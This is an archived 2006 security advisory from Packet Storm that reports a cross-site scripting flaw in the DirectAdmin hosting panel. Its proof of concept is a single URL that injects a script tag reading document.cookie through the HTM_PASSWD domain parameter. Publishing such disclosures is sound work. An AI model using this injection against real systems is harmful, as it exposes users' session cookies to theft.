DirectAdmin.txt

2006-04-30T00:00:00
ID PACKETSTORM:45955
Type packetstorm
Reporter Outlaw
Modified 2006-04-30T00:00:00

Description

                                        
                                            `#'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''  
#Aria-Security.net Advisory  
#Discovered by: O.U.T.L.A.W  
#Outlaw@aria-security.net  
#Gr33t to:A.u.r.a & R@1D3N & Cl0wn & Dtrap   
#'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''   
? Software: DirectAdmin  
? Support Website: http://www.Directadmin.com  
? advisory:http://www.aria-security.net/advisory/hm/directadmin.txt  
? Summary: DirectAdmin Is A Hosting Managment System  
? Tested On: http://www.directadmin.com/demo.html   
  
? Proof of Concept:  
LOCAL XSS attack:  
http://www.directadmin.com:2222/HTM_PASSWD?domain=".><script>alert(document.cookie)</script><!--  
  
  
?Solution:  
?contact advisory@aria-security.net  
  
`